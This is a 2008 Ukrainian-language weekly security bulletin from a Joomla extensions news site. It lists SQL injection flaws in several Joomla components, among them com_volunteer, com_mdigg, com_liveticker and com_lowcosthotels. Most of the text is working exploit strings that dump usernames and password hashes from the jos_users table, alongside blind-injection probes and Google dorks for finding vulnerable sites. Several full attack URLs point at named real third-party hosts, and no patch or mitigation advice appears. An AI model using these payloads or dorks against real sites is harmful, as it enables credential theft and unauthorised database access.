Тижневик безпеки №01
28.12.2008, 03:53 | Новини розширень Joomla! | Денис Носов
За тиждень, який минає знайдено вразливості у наступних розширеннях: mdigg 2.2.8, Live Ticker 1.0, Ice Gallery 0.5b2, com_allhotels, com_lowcosthotels, Volunteer 2.0.
com_volunteer (job_id) SQL-ін’єкція
Приклад:
http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]
Експойт:
-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--
Демо:
http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1
com_lowcosthotels (id) SQL-ін’єкція
Скрипт: http://www.joomlahbs.com/ DorK: inurl:index.php?option=com_lowcosthotels Демо:
com_allhote
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4%20%20%20
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
ls (id) SQL-ін’єкція
Скрипт:
http://www.joomlahbs.com/ та http://www.leveltensolutions.net/spa/
DorK: inurl:index.php?option=com_allhotels
Демо:
http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5
com_ice (catid) SQL-ін’єкція
Приклад:
http://localHost/path/index.php?option=com_ice&⁞catid=1[SQL code]
SQL код:
and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96
com_liveticker (tid) SQL-ін’єкція
Приклад:
http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL]
Демо:
http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4 >>(False)
http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5 >>(True)
com_mdigg (category) SQL-ін’єкція
Приклад:
http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]
Експойт:
-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*